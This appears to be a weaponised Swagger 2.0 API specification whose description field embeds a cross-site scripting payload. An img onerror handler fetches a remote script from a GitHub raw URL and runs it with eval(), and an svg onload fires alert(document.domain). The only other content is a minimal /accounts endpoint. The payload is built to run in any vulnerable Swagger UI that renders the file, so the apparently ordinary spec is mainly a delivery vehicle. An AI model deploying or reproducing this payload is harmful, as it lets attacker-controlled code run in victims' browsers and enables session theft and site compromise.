swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <math>
      <mtext>
        <img src onerror=fetch(`https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/script.js`)
                      .then(function(res){
                        res.text().then(function(data){
                          eval(data)
                        })
                      })>'><svg/onload=alert(document.domain)>ssss
      </mtext>
    </math>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      summary: "Account information"
      description: "Returns account details."
      responses:
        '200':
          description: "Successful retrieval of account information"
          schema:
            type: object
